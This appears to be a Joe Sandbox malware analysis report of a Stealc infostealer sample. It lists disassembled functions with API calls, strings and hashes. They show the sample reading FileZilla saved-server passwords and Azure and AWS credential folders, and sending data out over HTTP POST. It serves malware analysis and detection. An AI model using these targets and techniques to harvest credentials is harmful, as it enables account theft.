Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A

Part of subcall function 00CB8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CB8E52

strtok_s.MSVCRT ref: 00CB031B
GetProcessHeap.KERNEL32(00000000,000F423F,00CC0DBA,00CC0DB7,00CC0DB6,00CC0DB3), ref: 00CB0362
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00CB0385
lstrlenA.KERNEL32(00000000), ref: 00CB0393

Part of subcall function 00CB88E0: malloc.MSVCRT ref: 00CB88E8
Part of subcall function 00CB88E0: strncpy.MSVCRT ref: 00CB8903

StrStrA.SHLWAPI(00000000,<Port>), ref: 00CB03CF
lstrlenA.KERNEL32(00000000), ref: 00CB03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00CB0419
lstrlenA.KERNEL32(00000000), ref: 00CB0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00CB0463
lstrlenA.KERNEL32(00000000), ref: 00CB0475
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB0502
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00CB051A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00CB0532
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00CB054A
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00CB0562
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00CB0571
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00CB0580
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00CB0593
lstrcatA.KERNEL32(?,00CC1678,?,?,00000000), ref: 00CB05A2
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00CB05B5
lstrcatA.KERNEL32(?,00CC167C,?,?,00000000), ref: 00CB05C4
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00CB05D3
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00CB05E6
lstrcatA.KERNEL32(?,00CC1688,?,?,00000000), ref: 00CB05F5
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00CB0604
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00CB0617
lstrcatA.KERNEL32(?,00CC1698,?,?,00000000), ref: 00CB0626
lstrcatA.KERNEL32(?,00CC169C,?,?,00000000), ref: 00CB0635
strtok_s.MSVCRT ref: 00CB0679
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CC0DB2), ref: 00CB068E
memset.MSVCRT ref: 00CB06DD

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00CB02A4
<Host>, xrefs: 00CB037C
browser: FileZilla, xrefs: 00CB0559
profile: null, xrefs: 00CB0568
password: , xrefs: 00CB05FB
<Pass encoding="base64">, xrefs: 00CB045A
<User>, xrefs: 00CB0410
<Port>, xrefs: 00CB03C6
url: , xrefs: 00CB0577
login: , xrefs: 00CB05CA

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-555421843
Opcode ID: 522981bfcd1b1fbfbc46a8b099d3a850527eec0ab04b069f868a813abf8d4693
Instruction ID: fd0984ccb407ce1669955eb4e4309a03e1deac755478cd7d3270d326b9466e0d
Opcode Fuzzy Hash: 522981bfcd1b1fbfbc46a8b099d3a850527eec0ab04b069f868a813abf8d4693
Instruction Fuzzy Hash: 4DD12E71900208AFCB04EBF5DD9AEEE7778EF14300F544528F542B6091DF75AA4AEB61

Function 00CA5100 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA47EA
Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4801
Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4818
Part of subcall function 00CA47B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849

lstrlenA.KERNEL32(00000000), ref: 00CA5193

Part of subcall function 00CB8EA0: CryptBinaryToStringA.CRYPT32(00000000,00CA5184,40000001,00000000,00000000,?,00CA5184), ref: 00CB8EC0

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CA5207
StrCmpCA.SHLWAPI(?,007FD3E8), ref: 00CA5225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA5340
HttpOpenRequestA.WININET(00000000,007FD508,?,00801770,00000000,00000000,00400100,00000000), ref: 00CA53A4

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,00801CF8,00000000,?,007F47C0,00000000,?,00CC19DC,00000000,?,00CB51CF), ref: 00CA5737
lstrlenA.KERNEL32(00000000), ref: 00CA574B
GetProcessHeap.KERNEL32(00000000,?), ref: 00CA575C
HeapAlloc.KERNEL32(00000000), ref: 00CA5763
lstrlenA.KERNEL32(00000000), ref: 00CA5778
memcpy.MSVCRT(?,00000000,00000000), ref: 00CA578F
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00CA57A9
memcpy.MSVCRT(?), ref: 00CA57B6
lstrlenA.KERNEL32(00000000), ref: 00CA57C8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00CA57E1
memcpy.MSVCRT(?), ref: 00CA57F1
lstrlenA.KERNEL32(00000000,?,?), ref: 00CA580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CA5822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CA584D
InternetCloseHandle.WININET(00000000), ref: 00CA58B1
InternetCloseHandle.WININET(00000000), ref: 00CA58BE
InternetCloseHandle.WININET(00000000), ref: 00CA58C8

Strings

", xrefs: 00CA5706
------, xrefs: 00CA54F9
------, xrefs: 00CA5297
--, xrefs: 00CA5280
------, xrefs: 00CA53B7
", xrefs: 00CA5482
------, xrefs: 00CA563B
", xrefs: 00CA55C4

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2744873387-2774362122
Opcode ID: d2493b2da32de4ebaa9e57eb0d9779d88d9416f1d0fa12af1d244b4c7c4c4091
Instruction ID: 60ef8d78cb025ac5d29030949209496d9ae994f8d39206a1dfabe16de7eefd70
Opcode Fuzzy Hash: d2493b2da32de4ebaa9e57eb0d9779d88d9416f1d0fa12af1d244b4c7c4c4091
Instruction Fuzzy Hash: 55322D71D20118BADB14EBA1DCA1FEEB378BF54700F4041A9F14676492EF316A49EF62

Function 00CA5960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA47EA
Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4801
Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4818
Part of subcall function 00CA47B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CA59F8
StrCmpCA.SHLWAPI(?,007FD3E8), ref: 00CA5A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA5B93
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00801C08,00000000,?,007F47C0,00000000,?,00CC1A1C), ref: 00CA5E71
lstrlenA.KERNEL32(00000000), ref: 00CA5E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00CA5E93
HeapAlloc.KERNEL32(00000000), ref: 00CA5E9A
lstrlenA.KERNEL32(00000000), ref: 00CA5EAF
memcpy.MSVCRT(?,00000000,00000000), ref: 00CA5EC6
lstrlenA.KERNEL32(00000000), ref: 00CA5ED8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00CA5EF1
memcpy.MSVCRT(?), ref: 00CA5EFE
lstrlenA.KERNEL32(00000000,?,?), ref: 00CA5F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CA5F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00CA5F4C
InternetCloseHandle.WININET(00000000), ref: 00CA5FB0
InternetCloseHandle.WININET(00000000), ref: 00CA5FBD
HttpOpenRequestA.WININET(00000000,007FD508,?,00801770,00000000,00000000,00400100,00000000), ref: 00CA5BF8

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

InternetCloseHandle.WININET(00000000), ref: 00CA5FC7

Strings

------, xrefs: 00CA5A96
", xrefs: 00CA5E16
------, xrefs: 00CA5C0B
------, xrefs: 00CA5D4C
", xrefs: 00CA5CD5

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 1406981993-2180234286
Opcode ID: f7b00ef01e11e85b1afd1a6d0b4babded06091c57ec258b48dce0edf249a580c
Instruction ID: b110993941dafd94022af0d4c81989e650f7c7954e4894ac347af3d467ae88c4
Opcode Fuzzy Hash: f7b00ef01e11e85b1afd1a6d0b4babded06091c57ec258b48dce0edf249a580c
Instruction Fuzzy Hash: D2120A71820128BBDB15EBA0DC95FEEB378BF14700F5041A9F146B6491EF702A4AEF65

Function 00CAA790 Relevance: 40.8, APIs: 22, Strings: 1, Instructions: 538
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CBAA70: StrCmpCA.SHLWAPI(00000000,00CC1470,00CAD1A2,00CC1470,00000000), ref: 00CBAA8F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CAAAC8
RtlAllocateHeap.NTDLL(00000000), ref: 00CAAACF
StrCmpCA.SHLWAPI(00000000,ERROR_RUN_EXTRACTOR), ref: 00CAABE2
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CAA8B0

Part of subcall function 00CBA820: lstrlenA.KERNEL32(00000000,?,?,00CB5B54,00CC0ADB,00CC0ADA,?,?,00CB6B16,00000000,?,007F1348,?,00CC110C,?,00000000), ref: 00CBA82B
Part of subcall function 00CBA820: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA885

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

lstrcatA.KERNEL32(?,00000000,00000000,007FD628,00CC1318,007FD628,00CC1314), ref: 00CAACEB
lstrcatA.KERNEL32(?,00CC1320), ref: 00CAACFA
lstrcatA.KERNEL32(?,00000000), ref: 00CAAD0D
lstrcatA.KERNEL32(?,00CC1324), ref: 00CAAD1C
lstrcatA.KERNEL32(?,00000000), ref: 00CAAD2F
lstrcatA.KERNEL32(?,00CC1328), ref: 00CAAD3E
lstrcatA.KERNEL32(?,00000000), ref: 00CAAD51
lstrcatA.KERNEL32(?,00CC132C), ref: 00CAAD60
lstrcatA.KERNEL32(?,00000000), ref: 00CAAD73
lstrcatA.KERNEL32(?,00CC1330), ref: 00CAAD82
lstrcatA.KERNEL32(?,00000000), ref: 00CAAD95
lstrcatA.KERNEL32(?,00CC1334), ref: 00CAADA4
lstrcatA.KERNEL32(?,00000000), ref: 00CAADB7
lstrlenA.KERNEL32(?), ref: 00CAAE0D
lstrlenA.KERNEL32(?), ref: 00CAAE1C
memset.MSVCRT ref: 00CAAE6B

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA9E10: memcmp.MSVCRT ref: 00CA9E2D

DeleteFileA.KERNEL32(00000000), ref: 00CAAE97

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00CAABD4

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessmemcmpmemset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4068497927-2709115261
Opcode ID: b3536000c0c2ceebc3b66afdb5ca14eed9a8e25842f1b675432e829db0a928db
Instruction ID: 1ef0836baaa601619acf2e7684773bad80f8699974740d8c2af2f0f0936325de
Opcode Fuzzy Hash: b3536000c0c2ceebc3b66afdb5ca14eed9a8e25842f1b675432e829db0a928db
Instruction Fuzzy Hash: CD124F71910109ABDB18FBA1DD96EEE7378AF14300F544028F543B60E1DF35AE09EB62

Function 00CB4D70 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00CB4D87

Part of subcall function 00CB8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00CB8E0B

lstrcatA.KERNEL32(?,00000000), ref: 00CB4DB0
lstrcatA.KERNEL32(?,\.azure\), ref: 00CB4DCD

Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB492C
Part of subcall function 00CB4910: FindFirstFileA.KERNEL32(?,?), ref: 00CB4943

memset.MSVCRT ref: 00CB4E13
lstrcatA.KERNEL32(?,00000000), ref: 00CB4E3C
lstrcatA.KERNEL32(?,\.aws\), ref: 00CB4E59

Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FDC), ref: 00CB4971
Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC0FE0), ref: 00CB4987
Part of subcall function 00CB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00CB4B7D
Part of subcall function 00CB4910: FindClose.KERNEL32(000000FF), ref: 00CB4B92

memset.MSVCRT ref: 00CB4E9F
lstrcatA.KERNEL32(?,00000000), ref: 00CB4EC8
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00CB4EE5

Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB49B0
Part of subcall function 00CB4910: StrCmpCA.SHLWAPI(?,00CC08D2), ref: 00CB49C5
Part of subcall function 00CB4910: wsprintfA.USER32 ref: 00CB49E2
Part of subcall function 00CB4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00CB4A1E
Part of subcall function 00CB4910: lstrcatA.KERNEL32(?,007FD428,?,000003E8), ref: 00CB4A4A
Part of subcall function 00CB4910: lstrcatA.KERNEL32(?,00CC0FF8), ref: 00CB4A5C
Part of subcall function 00CB4910: lstrcatA.KERNEL32(?,?), ref: 00CB4A70
Part of subcall function 00CB4910: lstrcatA.KERNEL32(?,00CC0FFC), ref: 00CB4A82
Part of subcall function 00CB4910: lstrcatA.KERNEL32(?,?), ref: 00CB4A96
Part of subcall function 00CB4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00CB4AAC
Part of subcall function 00CB4910: DeleteFileA.KERNEL32(?), ref: 00CB4B31

memset.MSVCRT ref: 00CB4F2B

Strings

\.IdentityService\, xrefs: 00CB4ED9
\.azure\, xrefs: 00CB4DC1
Azure\.IdentityService, xrefs: 00CB4EEB
msal.cache, xrefs: 00CB4EF0
\.aws\, xrefs: 00CB4E4D
Azure\.azure, xrefs: 00CB4DD3
*.*, xrefs: 00CB4E64
*.*, xrefs: 00CB4DD8
Azure\.aws, xrefs: 00CB4E5F

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
